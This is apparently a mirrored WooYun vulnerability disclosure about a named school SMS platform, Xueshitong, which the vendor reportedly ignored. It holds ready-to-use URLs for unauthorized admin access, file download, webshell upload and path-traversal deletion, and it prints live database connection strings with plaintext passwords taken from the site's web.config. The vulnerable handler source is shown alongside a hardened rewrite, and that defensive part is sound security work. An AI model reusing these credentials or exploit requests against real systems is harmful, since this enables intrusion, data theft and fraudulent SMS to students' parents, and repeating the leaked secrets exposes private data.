WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops article mirror -------- http://drop.zone.ci/
2015-12-14: Vendor contacted; awaiting vendor acknowledgement. Details not disclosed.
2016-01-25: Vendor has actively ignored the vulnerability. Details disclosed to the public.
Dry weather, beware of fire
Xueshitong (学事通), a site I came across by chance. One of the risks is that the system can be used to mass-send scam SMS to students' parents.
http://www.njxt.net:8000
60.190.202.51
Unauthorized access:
http://www.njxt.net:8000/scmanage/index.aspx?sid=22&uname=0022029
http://www.njxt.net:8000/scmanage/index.aspx?sid=52&uname=0193001
http://www.njxt.net:8000/scmanage/index.aspx?sid=166&uname=0104060
Brute-forcing the school ID: a 403 means the school exists:
http://www.njxt.net:8000/image/studentimg/166/
Brute-forcing school accounts should work too (7 digits); not tried here.
Arbitrary file download:
http://www.njxt.net:8000/ashx/download.ashx?/scManage/学事通校园管理员-最新版.pdf
http://www.njxt.net:8000/ashx/download.ashx?/web.config

    <connectionStrings>
      <add name="SqlConnection" connectionString="server=60.190.202.36,14333\SZ;database=newSZJXT;uid=SZJXTUSER;pwd=DG8FV-B9TKY-FRT9J" />
      <add name="EngelishConnection" connectionString="server=60.190.202.20;database=SZLXYY;uid=sa;pwd=linkivr" />
      <add name="SMSConnction" connectionString="server=60.190.202.53,14333\SZ;database=SMS;uid=SZJXTUSER;pwd=DG8FV-B9TKY-FRT9J" />
      <add name="xstSmsConn" connectionString="server=60.190.202.38,49469;database=XST;uid=sa;pwd=qaz!@#0401"/>
    </connectionStrings>
Arbitrary file upload:
http://www.njxt.net:8000/scmanage/index.aspx?sid=166&uname=0104060
Student management -> Edit -> upload student photo: upload the shell directly and submit, then edit again to obtain its full address:
http://www.njxt.net:8000/flash/up.swf?url=/ashx/SaveFile.ashx&Img=/image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx&call=FlashCall
http://www.njxt.net:8000/image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx
The above was uploaded before the file-deletion test; the new address is:
http://www.njxt.net:8000/image/studentimg/166/724e49b4-b103-47af-b07e-3ad66047f93a.aspx
http://www.njxt.net:8000/ashx/download.ashx?/ashx/SaveFile.ashx
SaveFile.ashx source (as downloaded; no authentication, no extension check, and delName is used in a path unsanitized):

    <%@ WebHandler Language="C#" Class="SaveFile" %>
    using System;
    using System.Web;
    using System.IO;

    public class SaveFile : IHttpHandler
    {
        public void ProcessRequest(HttpContext context)
        {
            context.Response.ContentType = "text/plain";

            // delName is taken straight from the request and joined to the upload folder:
            // "../" sequences are not stripped, so any file under the web root can be deleted.
            var delName = context.Request["delName"];
            if (!string.IsNullOrEmpty(delName))
            {
                System.IO.File.Delete(context.Server.MapPath("/uploadtemp/" + delName));
                context.Response.End();
            }

            int length = (int)context.Request.InputStream.Length;
            if (length <= 0) return;
            byte[] buffer = new byte[length];
            context.Request.Files["Filedata"].InputStream.Read(buffer, 0, length);

            // The extension comes from the first request parameter and is never validated,
            // so .aspx is accepted; the file is written with a GUID name and the name returned.
            string fileExt = Path.GetExtension(context.Request.Params[0].ToString()).ToLower();
            string name = Guid.NewGuid().ToString() + fileExt;
            string path = HttpContext.Current.Server.MapPath("~/uploadtemp/" + name);
            System.IO.FileStream fs = new FileStream(path, FileMode.Create, FileAccess.Write);
            System.IO.BinaryWriter bw = new BinaryWriter(fs);
            bw.Write(buffer);
            bw.Close();
            fs.Close();
            context.Response.Write(name);
        }

        public bool IsReusable { get { return false; } }
    }
From the source, arbitrary file deletion:
http://www.njxt.net:8000/ashx/SaveFile.ashx?delName=../image/studentimg/166/df4fe0d2-f2b2-4e8b-9d58-724fd2ce8caf.aspx
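A hardened rewrite of the handler above, added here as an example (not the site's code), covering both the upload and the deletion findings: it requires an authenticated user, confines delName to the upload folder, and allowlists image extensions. It assumes the application already has forms/session authentication so that context.User is populated; the IIS side should additionally deny script execution in the upload folder.

```csharp
<%@ WebHandler Language="C#" Class="SaveFileHardened" %>
using System;
using System.IO;
using System.Web;

public class SaveFileHardened : IHttpHandler
{
    static readonly string[] AllowedExt = { ".jpg", ".jpeg", ".png", ".gif" };
    const int MaxBytes = 2 * 1024 * 1024;

    public void ProcessRequest(HttpContext context)
    {
        context.Response.ContentType = "text/plain";
        // 1. Reject anonymous callers (the original handler had no check at all).
        //    Assumes the app's own authentication populates context.User.
        if (context.User == null || !context.User.Identity.IsAuthenticated)
        { context.Response.StatusCode = 401; return; }

        string root = context.Server.MapPath("~/uploadtemp/");
        string delName = context.Request["delName"];
        if (!string.IsNullOrEmpty(delName))
        {
            // 2. Drop any directory part, resolve the path, and confirm it is still
            //    inside the upload folder and has an allowed extension.
            string target = Path.GetFullPath(Path.Combine(root, Path.GetFileName(delName)));
            bool inside = target.StartsWith(root, StringComparison.OrdinalIgnoreCase);
            bool allowed = Array.IndexOf(AllowedExt, Path.GetExtension(target).ToLowerInvariant()) >= 0;
            if (!inside || !allowed) { context.Response.StatusCode = 400; return; }
            if (File.Exists(target)) File.Delete(target);
            return;
        }

        HttpPostedFile file = context.Request.Files["Filedata"];
        if (file == null || file.ContentLength <= 0 || file.ContentLength > MaxBytes)
        { context.Response.StatusCode = 400; return; }

        // 3. Extension allowlist taken from the uploaded file's own name,
        //    not from an arbitrary request parameter as in the original.
        string ext = Path.GetExtension(file.FileName).ToLowerInvariant();
        if (Array.IndexOf(AllowedExt, ext) < 0) { context.Response.StatusCode = 400; return; }

        // 4. Server-generated name, so the client never controls the stored path.
        string name = Guid.NewGuid().ToString("N") + ext;
        file.SaveAs(Path.Combine(root, name));
        context.Response.Write(name);
    }

    public bool IsReusable { get { return false; } }
}
```

An extension allowlist alone does not verify file content; a magic-byte or image-decode check and a web.config that removes script handlers for /uploadtemp/ close the remaining gap.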
Judging from the image folder paths there are roughly 800 schools, each with a few hundred students, so the total headcount is considerable.
Finally, connecting to the database to take a look:
I did not look any further; please delete the SHELL yourselves.
None
Unable to contact the vendor, or the vendor actively refused.